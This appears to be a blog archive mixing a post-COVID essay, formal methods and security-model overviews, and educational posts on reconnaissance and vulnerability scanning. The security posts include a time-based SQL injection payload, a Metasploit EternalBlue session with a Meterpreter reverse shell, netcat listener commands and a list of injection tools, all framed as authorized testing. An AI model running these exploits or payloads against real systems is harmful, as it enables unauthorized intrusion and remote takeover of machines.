Wednesday, August 31, 2022

Post-COVID World

COVID-19 has changed the way we study, work, and live. While some of these changes are transient, others are permanent. The world after the pandemic will not be exactly like the world before it. Hence there is much discussion about what the post-COVID world will look like and what challenges it will pose around the globe.


The world after the COVID-19 pandemic:

During the pandemic, weak medical and healthcare systems led to the deaths of many people. As a result, every country has recognized the value of a robust healthcare system and is working to build one. Many nations were hurt when the world's supply chains were disrupted, so numerous countries began making efforts to become self-sufficient, and nationalism is increasingly displacing globalism. Until the virus is eradicated through widespread immunization, COVID may persist intermittently and be treated like the common flu. If a new virus is found, everyone will be on high alert, and worldwide action will be taken immediately to stop future pandemics. Virus checks at airports will become standard, and a COVID vaccination passport may also be required.

Jobs that can be done from home will increase. Employees will also expect strict working hours to preserve work-life balance: most jobs that can currently be done from home demand availability around the clock, which wears employees out, so new laws may be introduced to secure work-life balance. Everyone is now aware of the necessity of an emergency fund, and many people will begin saving money and setting up emergency funds in preparation for future turbulence. The value placed on life and the people we love will increase; because the pandemic kept us from seeing our loved ones, many people will make a point of meeting friends and family regularly.


The post-COVID world should look like this:

The COVID epidemic hit vulnerable people far harder than the general population. Most of those who lost their jobs were unskilled laborers, and because they lacked access to digital devices, children from poor families could not continue their education. Nations should therefore seek to lessen inequality and close this gap. Protecting those who are vulnerable requires action.


People realized during the lockdown that humans can positively impact the environment. Promoting sustainable growth can therefore significantly improve living conditions in the post-COVID era, and it is imperative to increase the number of green jobs.

Because of their higher population density, metropolitan areas became COVID hotspots. In the post-COVID era, better employment options should be available in rural areas so that development is spread more evenly across regions.


Summary:

The COVID epidemic brought about some lasting effects. We also need to make further adjustments, such as safeguarding the vulnerable by fostering a more inclusive and equal society. Key areas include threat perception, social context, science communication, balancing individual and collective interests, leadership, stress management, and coping with post-pandemic conditions. Actions supported by behavioral and social science are expected to restrain COVID-19's most damaging effects.

Sunday, June 12, 2022

Network Reconnaissance

Open Port / Service Identification:

In cybersecurity, the term open port refers to a TCP or UDP port number that is configured to accept packets; a port that rejects connections or ignores all packets is a closed port. Ports are an integral part of the Internet communication model: all communication over the Internet is exchanged via ports. Each IP address has two sets of ports, UDP and TCP, with up to 65,535 ports of each type. Internet-dependent services (web browsers, websites, file transfer services, and so on) rely on specific ports to send and receive information. For example, developers use the File Transfer Protocol (FTP) or SSH to exchange files between hosts or run encrypted tunnels between computers.


Once a service is running on a particular port, you cannot run another service on that port. For example, if you start Apache after starting Nginx on port 80, the operation will fail because the port is already in use. Open ports become dangerous when a legitimate service listening on them has an exploitable vulnerability, or when malware or social engineering introduces a malicious service onto the system. Cybercriminals can use such services on open ports to gain unauthorized access to sensitive data. Closing unused ports reduces the number of attack vectors your organization exposes and thereby reduces your security risk.
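
As a rough illustration, you can check whether a TCP port is open from Python's standard library by simply attempting a connection. The host below is a placeholder documentation address, and a successful connect only means something accepted the packet, not that the service is safe:

    import socket

    def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
        """Return True if a TCP connection to host:port succeeds."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    # Hypothetical target: check whether a web server accepts connections.
    print(is_port_open("192.0.2.10", 80))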


Service identification and system identification:

Service identification and system identification are the third and fourth modules listed in the Information Technology Security Testing section of OSSTMM, respectively. The purpose of these two sections is to list the services running on the TCP or UDP ports that responded in the previous module and identify the target's underlying operating system.


Banner/ version check:

An email server responds to connections on port 25 with a text string called an SMTP banner. This string exists to tell connecting clients whatever the server administrator wants to convey to the world. It is good practice to include the server's hostname in the SMTP banner so that anyone connecting to the IP address knows what they are talking to. A warning such as "the SMTP banner issued by the mail server does not match the hostname resolved from the server's IP address" is raised when the name in the banner is not in the same domain as the hostname returned by a PTR (reverse DNS) lookup of the IP address.
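
A banner check of the kind described here can be sketched with a plain socket: connect to port 25 and read the 220 greeting the server volunteers. The mail host below is a placeholder:

    import socket

    def grab_smtp_banner(host: str, port: int = 25, timeout: float = 5.0) -> str:
        """Connect to an SMTP server and return its greeting banner."""
        with socket.create_connection((host, port), timeout=timeout) as s:
            banner = s.recv(1024).decode(errors="replace").strip()
            s.sendall(b"QUIT\r\n")  # politely end the SMTP session
        return banner

    # Hypothetical mail server; a typical reply looks like
    # "220 mail.example.com ESMTP Postfix".
    print(grab_smtp_banner("mail.example.com"))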


For some time, many servers "masked" their SMTP banners, replacing letters with asterisks for hosts outside the network. The usual reasoning was a fear of handing outsiders information that would help them attack the server. The benefit is minimal, and because many servers perform banner checks as part of anti-spam processing, masking can actually carry a cost: if the banner is masked, diagnostic tools will display a warning.


Some receiving mail servers may count a mismatched or masked banner against you as a potential spam indicator in their rating systems, but in most cases it will not by itself cause incoming mail to be rejected. If you do not have a PTR record, or if the record does not match your hostname, we recommend contacting your ISP and asking them to set up a reverse (PTR) record that matches your mail server's hostname.


Traffic probe:

In telecommunications, a probe is typically an action or object used to learn the state of a network, for example sending an empty message to see whether a target exists; ping is the standard utility for sending such probes. A probe can also be a program or device inserted at a key point in your network to monitor or collect data about network activity. From the perspective of computer security, probes are attempts to access a computer and its files through known or suspected vulnerabilities in the system.
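
ICMP ping requires raw sockets (and usually administrator rights), so a minimal probe is often done as a TCP reachability check instead. This sketch, aimed at a placeholder address, measures whether and how quickly a host answers on a given port:

    import socket
    import time

    def tcp_probe(host: str, port: int = 80, timeout: float = 2.0):
        """Probe a host: return round-trip time in ms, or None if unreachable."""
        start = time.monotonic()
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return (time.monotonic() - start) * 1000.0
        except OSError:
            return None

    rtt = tcp_probe("192.0.2.10")  # hypothetical target
    print("alive, %.1f ms" % rtt if rtt is not None else "no response")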


Understanding Port and Services tools:

Datapipe - Datapipe is a classic Unix command-line port redirection tool: it listens on a local TCP port and forwards any connection it receives to a port on another host.

Fpipe - FPipe natively implements port redirection technology on Windows. It also supports User Datagram Protocol (UDP), which Datapipe does not have. FPipe does not require support DLLs or privileged user access. However, it only runs on NT, 2000, and XP platforms.

WinRelay - WinRelay is another Windows-based port redirection tool. It shares FPipe's functionality, including the ability to define a static source port for the redirected traffic, and it can be used interchangeably with FPipe on any Windows platform.
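
The core idea behind Datapipe, FPipe, and WinRelay, accepting on one port and relaying bytes to another host and port, fits in a few lines of Python. This is a single-connection sketch with placeholder addresses, not a replacement for those tools:

    import socket
    import threading

    def redirect(listen_port: int, target_host: str, target_port: int):
        """Accept one TCP connection and relay traffic to the target."""
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", listen_port))
        srv.listen(1)
        client, _ = srv.accept()
        remote = socket.create_connection((target_host, target_port))

        def pump(src, dst):
            # Copy bytes one way until the source closes the connection.
            while data := src.recv(4096):
                dst.sendall(data)
            dst.close()

        threading.Thread(target=pump, args=(client, remote)).start()
        pump(remote, client)

    # Hypothetical use: expose a remote web server on local port 8080.
    redirect(8080, "192.0.2.10", 80)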


Network Reconnaissance:

Network reconnaissance is the practice of testing a computer network for potential vulnerabilities. It may be a legitimate activity by the network's owner or operator, seeking to protect the network or enforce its acceptable use policy, or it may be a precursor to an external attack on the network.

Nmap - Nmap is a network scanner developed by Gordon Lyon. Nmap is used to discover hosts and services on your computer network by sending packets and analyzing the response. Nmap provides many features for inspecting your computer networks, such as host discovery and service and operating system discovery.

THC-Amap - Amap is an excellent tool for determining which application is listening on a particular port. Its database isn't as extensive as the one Nmap uses for version detection, but it is worth trying when you want a second opinion or when Nmap fails to identify a service. Amap also knows how to parse Nmap output files. This is another valuable tool from the fine people at THC.
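
The connect-scan technique that Nmap falls back on without raw-socket privileges can be approximated in a few lines; real scanners add timing control, raw SYN packets, and service fingerprinting on top of this. The target address is a placeholder:

    import socket

    def connect_scan(host: str, ports, timeout: float = 0.5):
        """Try a full TCP connect to each port; return the ones that answer."""
        open_ports = []
        for port in ports:
            try:
                with socket.create_connection((host, port), timeout=timeout):
                    open_ports.append(port)
            except OSError:
                pass
        return open_ports

    # Hypothetical target: scan a handful of well-known ports.
    print(connect_scan("192.0.2.10", [21, 22, 25, 53, 80, 110, 143, 443]))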


Network Sniffers and Injection tools:

A network sniffer is a tool for monitoring the flow of data packets on a computer network. Such tools are also known as packet sniffers, network analyzers, packet analyzers, snoops, or network probes. Network sniffing can be performed with a hardware device or purely in software, and it is primarily used to evaluate network traffic and data packets. Several widely used sniffers are listed below, followed by a small sniffing sketch.

· TCPdump - tcpdump is a computer program for data network packet analysis that runs from the command-line interface. It allows users to view TCP/IP and other packets sent and received over the computer's network. tcpdump is distributed under the BSD license and is free software.

· Windump - WinDump is the Windows version of tcpdump, the command-line network analyzer for UNIX. WinDump is fully compatible with tcpdump and can be used to monitor, diagnose, and dump network traffic to disk according to various complex rules. It runs on Windows 95, 98, ME, NT, 2000, XP, 2003, and Vista. WinDump captures packets using the WinPcap library and drivers, which can be downloaded free from the WinPcap.org website, and it supports 802.11b/g wireless capture and troubleshooting via the Riverbed AirPcap adapter. WinDump is free and released under a BSD-style license.

· Wireshark - Wireshark is a free open-source packet analyzer. It is used for network troubleshooting, analysis, software and communication protocol development, and training. Originally called Ethereal, the project was renamed Wireshark in May 2006 due to brand issues.

· Ettercap - Ettercap is a free open source network security tool for man-in-the-middle attacks on your LAN. It can be used for computer network log analysis and security audits. It works on various Unix-like operating systems such as Linux, Mac OS X, BSD, Solaris, and Microsoft Windows.

· Hping - Hping is an open-source packet generator and analyzer for the TCP/IP protocol created by Salvatore Sanfilippo (also known as Antirez). It is one of the common tools used for security auditing and for testing firewalls and networks, and it was used to exploit the idle scan technique (also invented by the hping author), which is now implemented in the Nmap Security Scanner. The latest version, hping3, is scriptable in the Tcl language and implements an engine for a string-based, human-readable description of TCP/IP packets, so that a programmer can write scripts for low-level TCP/IP packet manipulation and analysis in a short time.

· Kismet - Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet works with any wireless card that supports raw monitoring mode and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. The program runs under Linux, FreeBSD, NetBSD, OpenBSD, and Mac OS X. The client can also run on Microsoft Windows, although, apart from external drones, only one supported wireless card is available as a packet source. Distributed under the GNU General Public License, Kismet is free software.
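
As a sketch of what these sniffers do programmatically, the Scapy library (assuming it is installed and the script runs with capture privileges) can capture and summarize a few packets:

    # Requires: pip install scapy, plus root/administrator rights to capture.
    from scapy.all import sniff

    def show(packet):
        # Print a one-line summary of each captured packet.
        print(packet.summary())

    # Capture five TCP packets on the default interface, like a tiny tcpdump.
    sniff(filter="tcp", prn=show, count=5)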


Injection Tools:

This is a list of the best and most popular SQL injection tools; a minimal illustration of the time-based technique several of them automate follows the list:

· SQLMap - Automatic SQL Injection And Database Takeover Tool

· jSQL Injection - Java Tool for Automatic SQL Database Injection

· BBQSQL - A Blind SQL Injection Exploitation Tool

· NoSQLMap - Automated NoSQL Database Pwnage

· Whitewidow - SQL Vulnerability Scanner

· DSSS - Damn Small SQLi Scanner

· explo - Human and Machine Readable Web Vulnerability Testing Format

· Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting

· Leviathan - Wide Range Mass Audit Toolkit

· Blisqy - Exploit Time-based blind-SQL injection in HTTP headers (MySQL/MariaDB)
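
For a sense of what the time-based tools above automate: if injecting a deliberate delay (here MySQL's SLEEP) makes the response measurably slower, the parameter is probably injectable. The URL and parameter below are hypothetical, and this should only ever be run against systems you are authorized to test:

    import time
    import requests  # third-party: pip install requests

    def looks_time_injectable(url: str, param: str) -> bool:
        """Compare response times with and without an injected SLEEP(5)."""
        def timed(value):
            start = time.monotonic()
            requests.get(url, params={param: value}, timeout=30)
            return time.monotonic() - start

        baseline = timed("1")
        delayed = timed("1' AND SLEEP(5)-- -")  # MySQL/MariaDB delay payload
        return delayed - baseline > 4.0

    # Hypothetical, authorized target only.
    print(looks_time_injectable("http://testsite.example/item", "id"))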

Thursday, June 09, 2022

Vulnerability scanning


What is a vulnerability scan?

A vulnerability scan assesses computers, internal and external networks, and communication devices for weaknesses that cybercriminals could exploit. This automated activity scans infrastructure targets, such as ranges of IP addresses, for known vulnerabilities and misconfigurations. The resulting vulnerability assessment report helps you quickly identify the security weaknesses that need to be repaired.


What is the vulnerability scan used for?

Vulnerability testing is an essential part of mitigating an organization's security risks. Using a vulnerability scanner to identify weaknesses in your systems lets you reduce the attack surface criminals might exploit and focus your security efforts on the areas most likely to be targeted. Vulnerability scanning also helps you check IP address ranges periodically to determine whether unauthorized services are exposed or redundant IP addresses are in use.


How does the vulnerability test work?

There are two main types of vulnerability scans.

Unauthenticated scans detect security perimeter vulnerabilities. Authenticated scans use privileged credentials to further find security vulnerabilities in the internal network. Regardless of which type you choose, the vulnerability scanning tool uses a database of known vulnerabilities, bugs, anomalies, configuration errors, and potential routes to corporate networks that an attacker could exploit. These databases are continuously updated.
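
In miniature, the unauthenticated side of this process is banner grabbing plus a lookup against a vulnerability database. The tiny inline "database" below is invented purely for illustration; real scanners use continuously updated feeds:

    import socket

    # Toy stand-in for a real, continuously updated vulnerability feed.
    KNOWN_VULNERABLE = {
        "OpenSSH_7.2": "example entry: outdated SSH build with published CVEs",
    }

    def check_banner(host: str, port: int = 22) -> str:
        """Grab a service banner and flag it if it matches the toy database."""
        with socket.create_connection((host, port), timeout=3) as s:
            banner = s.recv(256).decode(errors="replace").strip()
        for needle, note in KNOWN_VULNERABLE.items():
            if needle in banner:
                return f"{banner} -> FLAGGED ({note})"
        return f"{banner} -> no match in database"

    print(check_banner("192.0.2.10"))  # hypothetical target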


Why is vulnerability scanning necessary?

Vulnerabilities are common to organizations of all sizes. New ones are constantly being discovered or introduced through system changes. Criminal hackers use automated tools to identify and exploit known vulnerabilities and access unsecured systems, networks, or data. Exploiting vulnerabilities with automated tools is easy: attacks are cheap, simple to carry out, and indiscriminate, so every organization connected to the Internet is at risk. An attacker needs only one vulnerability to get into the network, which is why patching these vulnerabilities is essential. If you do not update your software, firmware, and operating systems promptly after new releases, the vulnerabilities in your systems will remain exploitable and your business will remain at risk. Worse, most intruders are not discovered until it is too late.


What does the Vulnerability Scan test?

An automated vulnerability scanning tool scans open ports and the standard services running on those ports. It identifies configuration issues and other vulnerabilities in these services and checks that best practices are followed, such as using TLSv1.2 or later with strong cipher suites. A vulnerability scan report is then generated to highlight each identified item.
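
The TLS best-practice check mentioned above can be reproduced with Python's standard ssl module, which reports the protocol version actually negotiated with a server:

    import socket
    import ssl

    def negotiated_tls_version(host: str, port: int = 443) -> str:
        """Complete a TLS handshake and return the negotiated version."""
        context = ssl.create_default_context()
        with socket.create_connection((host, port), timeout=5) as sock:
            with context.wrap_socket(sock, server_hostname=host) as tls:
                return tls.version()  # e.g. "TLSv1.2" or "TLSv1.3"

    version = negotiated_tls_version("example.com")
    print(version, "(flag anything below TLSv1.2)")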


Who will perform the vulnerability scan?

IT departments typically perform vulnerability scans when they have the expertise and the software; otherwise, an external security service provider such as IT Governance can be used. IT Governance performs scans only against targets for which the client has the necessary permissions, and users of the service must ensure they hold those permissions. Vulnerability scans are also performed by attackers, who scan the Internet looking for entry points into systems and networks.


Vulnerability Probe:

Vulnerability probes use scanning technology to examine your organization's network for signs of potential breach risk. Not all probes are created equal, however, and relying on a weak one can leave your business exposed to cyber risk. Three practices make vulnerability probes continuously uncover hidden cyber risks:

1. View your network the way a hacker would.

2. Use vulnerability assessment tools that highlight the most imminent risks.

3. Use a continuous vulnerability probe.


Vulnerability examples:

When a computer is attached to an unsecured network, its software security may be compromised unless certain protocols are in place. Missed updates, weak points in products, and unresolved developer issues leave your customers wide open to computer security vulnerabilities. Here is a list of several vulnerabilities that compromise the integrity, availability, and confidentiality of your customers' products.

Critical mistakes in your customers' computer software can leave data across the entire network vulnerable to a number of malicious threats, including:

· Malware

· Phishing

· Proxies

· Spyware

· Adware

· Botnets

· Spam


Cyber attackers, hackers, and malware can take over your customers' software, disable it, and steal data.

The most common software vulnerabilities are:

· Lack of data encryption

· OS command injection

· SQL injection

· Buffer overflow

· No authentication for important features

· Missing authorization

· Unrestricted upload of dangerous file types

· Reliance on untrusted inputs in security decisions

· Cross-site scripting and cross-site request forgery

· Download of code without an integrity check

· Use of broken algorithms

· URL redirect to an untrusted website

· Path traversal

· Bugs

· Weak passwords

· Software that is already infected with a virus

The list grows longer each year as new ways of stealing and corrupting data are discovered.


How to prevent computer vulnerabilities?

· Stay on top of bandwidth usage by sending alerts when your device crosses thresholds.

· Block users from accessing suspicious or confirmed-unsafe websites.

· Set allowlists and blocklists to override category-based filters.

· Apply web bandwidth checks.

· Filter web activity by tags, categories, and URLs to reveal trends, spikes, and irregularities.

· Conclude with a detailed reporting tool that can analyze browsing activity and demonstrate the effectiveness of web security.

· Identify risks with iScan Online software, show where they reside, and rate the risk in dollars.


OpenVAS (Open Vulnerability Assessment Scanner):

OpenVAS is a full-featured vulnerability scanner. Its capabilities include unauthenticated and authenticated testing, support for a range of high-level and low-level internet and industrial protocols, performance tuning for large-scale scans, and a powerful internal programming language for implementing vulnerability tests. The scanner has a long history and obtains its vulnerability tests from a feed with regular updates. OpenVAS has been developed and promoted by Greenbone Networks since 2006. Together with other open-source modules, it forms Greenbone Vulnerability Management, which is also part of the commercial Greenbone Enterprise Appliance family of vulnerability management products.


Metasploit:

Metasploit is the world's leading open-source penetration testing framework, used by security engineers as a platform for building security tools and exploits and for running penetration tests. The framework makes hacking simple for attackers and defenders alike. Metasploit's tools, libraries, user interfaces, and modules allow users to configure an exploit module, pair it with a payload, point it at a target, and launch it against the target system. Metasploit's extensive database contains hundreds of exploits and multiple payload options.


Metasploit penetration testing begins with an information gathering phase, in which Metasploit integrates with various reconnaissance tools such as Nmap, SNMP scanning, Windows patch enumeration, and Nessus to find vulnerable systems. Once a vulnerability is identified, the tester selects an exploit and payload to penetrate the chink in the armor. If the exploit succeeds, the payload executes on the target, and the user gets a shell for interacting with it. One of the most popular payloads for attacking Windows systems is Meterpreter, an interactive shell that lives only in memory. Once on the target machine, Metasploit offers various exploitation tools for privilege escalation, packet sniffing, pass-the-hash, keylogging, screen capture, and pivoting. Users can also set up a persistent backdoor that survives reboots of the target computer.
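
An illustrative msfconsole session for the workflow just described might look like the following. The module shown is the well-known EternalBlue exploit; the addresses are placeholders for a lab you are authorized to test:

    msf6 > use exploit/windows/smb/ms17_010_eternalblue
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.0.2.10
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.0.2.5
    msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
    meterpreter > getuid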


Networks Vulnerability Scanning:

Network vulnerability scanning identifies vulnerabilities in computers, networks, or other IT resources that are potential targets for exploitation by threat actors. Scan your environment for vulnerabilities to find out about your current risk situation, the effectiveness of your security measures, and the opportunity to improve your defenses by fixing vulnerabilities. Obtaining and deploying the Network Vulnerability Scanner is often the first step in creating a more proactive security program. Building high walls and waiting for a siege is no longer enough to counter modern attackers. Modern security programs need to identify and seal vulnerabilities that can be exploited before attackers can exploit them. The Network Vulnerability Scanner provides a good barometer of your security team's overall success and progress by quickly scanning your network for these vulnerabilities, prioritizing and fixing them.


Network vulnerability scanners should be designed to scan the entire IT infrastructure and identify potential vulnerabilities that could be exploited. To do this, the scanner needs (at least) the following features:

· Scan scheduling that does not affect network availability or performance

· Comprehensive scan based on the most comprehensive list of known vulnerabilities and misconfigurations

· Adaptability and scalability to unique network architectures; this also applies to cloud-based and containerized assets

· Identification of the greatest and most serious threats to the environment

· Prioritization and risk analysis to better inform vulnerability remediation strategies and report progress


NetCat vs. SoCat:

Netcat and Socat allow you to send simple messages interactively between computers over a network. The settings shown below let a client and a server send data to each other, working like a simple ad hoc chat program. Socat can communicate with Netcat, and Netcat can communicate with Socat. Netcat is a network utility that reads and writes data across network connections; Socat is a relay for bidirectional data transfer between two independent data channels.
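
A minimal version of that chat setup, assuming traditional netcat flags (BSD netcat omits -p), looks like this, with 192.0.2.1 standing in for the server's address:

    # Terminal 1 (server): listen on TCP port 4444
    nc -l -p 4444               # netcat
    socat - TCP-LISTEN:4444     # socat equivalent

    # Terminal 2 (client): connect and type messages
    nc 192.0.2.1 4444           # netcat
    socat - TCP:192.0.2.1:4444  # socat equivalent

Lines typed in either terminal appear in the other, and either tool can sit on either end.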


Monday, May 30, 2022

Formal Methods

Formal methods are system design techniques that use rigorously specified mathematical models to build software and hardware systems. In contrast to other design approaches, formal methods use mathematical proof as a complement to system testing in order to ensure correct behavior. As systems become more complex, and security becomes an increasingly important issue, the formal approach to system design offers another level of assurance. It is very important to note that formal verification does not rule out the need for testing. Formal verification cannot fix bad assumptions in the design, but it helps identify errors in reasoning that would otherwise remain unverified. In several cases, engineers have reported finding flaws in systems after formally reviewing their designs. Broadly speaking, formal design can be seen as a three-step process, following the outline below.

1. Formal Specification: During the formal specification phase, the engineer rigorously defines a system using a modeling language. A modeling language is a fixed grammar that allows users to model complex structures out of predefined types. This process of formal specification is similar to converting a word problem into algebraic notation. In many ways, this step of the formal design process is similar to the formal software engineering techniques developed by Rumbaugh, Booch, and others; at the least, both techniques help engineers clearly define their problems, goals, and solutions. However, a formal modeling language is more rigorously defined: a formal grammar distinguishes between WFFs (well-formed formulas, that is, valid logical expressions) and non-WFFs (syntactically incorrect statements). Even at this stage, the distinction between WFF and non-WFF helps to specify the design, and several engineers who have used formal specifications say that the clarity this stage produces is a benefit in itself.

2. Verification: As mentioned above, formal methods differ from other specification systems by their strong emphasis on provability and correctness. By building a system using a formal specification, the designer is actually developing a set of theorems about his system, and by proving these theorems correct, he verifies the design; a toy machine-checked proof appears after this list. Verification is a difficult process, largely because even the simplest system has several dozen theorems, each of which must be proven. Even a traditional mathematical proof is a complex affair: Wiles' proof of Fermat's Last Theorem, for example, took several years after its announcement to complete. Given the demands of complexity and Moore's law, almost all formal systems use an automated theorem proving tool of some form. These tools can prove simple theorems, verify the semantics of theorems, and provide assistance for verifying more complicated proofs.

3. Implementation: After the model is specified and validated, the model is implemented by converting the specification into code. As the distinction between software and hardware design became narrower, formal methods for designing embedded systems emerged. For example, LARCH has a VHDL implementation. Similarly, hardware systems such as VIPER and AAMP5 processors have been developed using a formal approach.
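
For a flavor of the verification step, here is a toy machine-checked proof in Lean (one proof assistant among many; the choice here is illustrative). The checker rejects the theorem unless every step is valid:

    -- Lean 4: a tiny theorem and its machine-checked proof.
    theorem swap_and (p q : Prop) : p ∧ q → q ∧ p := by
      intro h                  -- assume p ∧ q
      exact ⟨h.right, h.left⟩  -- reassemble the parts in the other order

Real verification efforts prove hundreds of such theorems about the system model rather than one line of logic, but the mechanics are the same.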


Key concepts of formal methods:

Provability and automated verification: Formal methods differ from other specification systems in their strong emphasis on correctness and proof, which is ultimately another measure of system integrity. Proof is a supplement to, not a replacement for, testing. Testing is an important part of ensuring the suitability of any system, but it is finite: it cannot show that the system functions correctly, only that the system works in the cases that were tested. Because testing cannot show that a system works beyond the tested cases, formal proof is required. Formally proving computer systems is not a new idea; Knuth and Dijkstra wrote extensively on the subject, but their proofs relied on traditional mathematical methods. In pure mathematics, proofs are verified through extensive peer review before publication. Such techniques are time-consuming and far from perfect, and it is not uncommon for published proofs to contain errors. Given the cost and time constraints of systems engineering, these traditional techniques are not really applicable. Because of the expense of verifying proofs by hand, most formal methods use an automated theorem proving system to validate the design. An automated theorem prover is best described as a mathematical CAD tool: it proves simple theorems automatically and helps check more complex ones.


Advantages:

Formal methods offer additional benefits beyond provability, and these benefits are worth mentioning. However, most of these benefits are available from other systems and usually do not have the sharp learning curve required by formal methods.

Discipline: Because of their rigor, formal systems require engineers to reason more thoroughly about their designs. In particular, formal proofs of correctness require rigorously specified goals, not just operations. This thoroughness helps uncover faulty reasoning far earlier than traditional design does. The discipline of formal specification has also proven itself on existing systems; for example, engineers using the PVS system reportedly identified several microcode errors in one of the microprocessor designs they examined.

Precision: Traditionally, as the weaknesses of natural language for specifications became apparent, engineering moved toward jargon and formal notation. There is no reason systems engineering should differ, and several formal methods are used almost exclusively as notation. For engineers designing safety-critical systems, the benefit of formal methods lies in their precision: unlike many other design approaches, formal verification requires very precisely defined goals and approaches. In a safety-critical system, ambiguity can be extremely dangerous, and one of the primary benefits of the formal approach is its elimination of ambiguity.


Disadvantages:

Bowen points out that formal methods are generally viewed with suspicion by the professional engineering community, and the preliminary case studies and the tendency of papers to advocate formal methods seem to support his thesis [Bowen93]. There are several reasons why formal methods are not used more often, and most of them stem from overstatement by the proponents of formal methods.

Cost: Because of their rigor, formal methods are almost always more costly than traditional engineering approaches. Exactly how much more expensive formal verification is remains debatable, since software cost estimation is more art than science. Formal methods generally carry higher up-front costs and consume less as the project progresses, which is the reverse of the usual software development cost model.

Computational model limitations: This is not a universal problem, but most formal methods introduce some form of computational model, and they usually restrict the allowed operations in order to keep the notation elegant and the system provable. Unfortunately, from a developer's point of view, these design limitations are usually considered intolerable.

Usability: Traditionally, formal methods have been judged by the richness of their descriptive model: a "good" formal method can describe many different systems, while a "bad" one has limited descriptive ability. A comprehensive formal description language is appealing from a theoretical standpoint, but the pursuit of that goal has tended to produce incredibly complex and subtle description languages with difficulties rivaling those of natural language. Case studies of fully formal methods often acknowledge the need for a more usable approach.


The Lightweight approach:

In recent years, attention has turned to the flaws of formal specification, and several alternative approaches have emerged. The traditional view of formal methods as a comprehensive and highly abstract scheme made them all-encompassing, very rigorous, and very expensive, and although attractive in theory, such methods were largely ignored by practicing engineers. The lightweight approach to formal design recognizes that formal methods are not a panacea: there are places where formal methods are useful and places where formal specification is not. A lightweight design applies formal methods in selected places, and different methods can be used for different subsystems, ideally exploiting the strengths of each. In such a system, Petri nets might describe the communication protocols while a LARCH system models the data storage; for the rest of the system, formal specification can be omitted altogether, for example by refining the user interface through rapid prototyping and customer interviews.


Available tools, techniques, and metrics

Larch: Unlike most formal systems, LARCH provides two tiers of specification: a general high-level modeling language and a collection of implementation dialects designed to work with specific programming languages.

SML: Standard Meta-Language is a strongly typed functional programming language originally designed for exploring ideas in type theory. SML has become the formal methods workhorse because of its strong typing and provability features.

HOL: HOL, short for Higher Order Logic, is an automated theorem proving system. As with most automated theorem proving systems, HOL is a computer-aided proof tool: it proves simple theorems and assists in proving more complicated statements, but is still dependent on interaction with a trained operator. HOL has been extensively used for hardware verification, the VIPER chip being a good example.

Petri Nets: Petri Nets are a good example of a very 'light' formal specification. Originally designed for modeling communications, Petri Nets are a graphically simple model for asynchronous processes.

Monday, May 23, 2022

Computer Security models

A security model defines the relationship between the important security aspects and operating system behavior; a computer security model is a scheme for specifying and enforcing security policies. A security model may be founded upon a formal model of access rights, a model of computation, or a model of distributed computing, or it may have no particular theoretical grounding at all. Several security models are described below.



Bell-LaPadula Model:


The Bell-LaPadula model was originally developed for the US Department of Defense (DoD). It was the first mathematical model of a multilevel security policy, formalizing the concepts of secure state and mandatory access control, and it ensures that information flows only in ways that preserve confidentiality and never violate system policy.


Bell-LaPadula defines several rules and properties, described below.


Simple Security Property: "no read up". A subject at a given clearance level cannot read objects at a higher classification level. For example, a subject with Secret clearance cannot read a Top Secret object.


Star (*) Security Property: "no write down". A subject at a higher clearance level cannot write information down to a lower classification level. For example, a subject logged into a Top Secret system cannot forward email to a Secret system.


Strong Tranquility Property: security labels do not change while the system is operating.


Weak Tranquility Property: security labels are never changed in a way that violates the defined security properties.
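
A minimal sketch of how the two access rules might be enforced in code (the clearance levels are invented for illustration; Biba's integrity rules, covered next, are simply these checks inverted):

    LEVELS = {"Unclassified": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}

    def can_read(subject: str, obj: str) -> bool:
        """Simple Security Property: no read up."""
        return LEVELS[subject] >= LEVELS[obj]

    def can_write(subject: str, obj: str) -> bool:
        """Star Property: no write down."""
        return LEVELS[subject] <= LEVELS[obj]

    print(can_read("Secret", "Top Secret"))   # False: reading up is denied
    print(can_write("Top Secret", "Secret"))  # False: writing down is denied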



Biba Model:

The Biba model is somewhat like BLP, but it does not focus on confidentiality: integrity is the main concern of the Biba model, and it is often used where integrity matters more than confidentiality. It is easiest to think of it as BLP with the rules reversed. Confidentiality is a major concern of many governments, but most companies want assurance that the integrity of their data is maintained at the highest level, and Biba is the model of choice when guaranteeing integrity is important. The two main rules of the Biba model are the Simple Integrity Axiom and the Star (*) Integrity Axiom.


Simple Integrity Axiom: "no read down". A subject at a given integrity level cannot read information at a lower integrity level. This keeps potentially malicious information from lower integrity levels away from subjects handling important data, preserving integrity.


Star (*) Integrity Axiom: "no write up". A subject at a given integrity level cannot write information to a higher integrity level. This prevents questionable material from propagating up to higher integrity levels, protecting integrity.



Clark-Wilson Model:


The Clark-Wilson model deals with two types of objects, CDIs and UDIs, that is, constrained and unconstrained data items. It also defines two types of procedures: IVPs (integrity verification procedures) and TPs (transformation procedures). The role of an IVP is to confirm that CDIs are in a valid state and that every TP is certified to perform valid transformations; only certified TPs are allowed to modify CDIs. In other words, when this integrity model is implemented properly, it protects the integrity of information and ensures well-formed transactions.



Brewer and Nash Model:


Also known as the Chinese Wall model, this model is used to avoid conflicts of interest by prohibiting people, such as consultants, from accessing multiple COIs (conflict-of-interest categories). The access control policy changes with user behavior: once a person has accessed one party's data, they can no longer access the data of that party's competitors.



Harrison-Ruzzo-Ullman Model:


The Harrison-Ruzzo-Ullman model can be considered an extension of the BLP model. The Bell-LaPadula model provides no mechanism for changing access rights or for creating and deleting subjects and objects. The Harrison-Ruzzo-Ullman model addresses these issues by defining a structure for granting access rights and verifying compliance with a specified policy, thereby preventing unauthorized access. The model can be implemented via an access control matrix or capability lists.

Tuesday, May 17, 2022

Firewall and packet filters

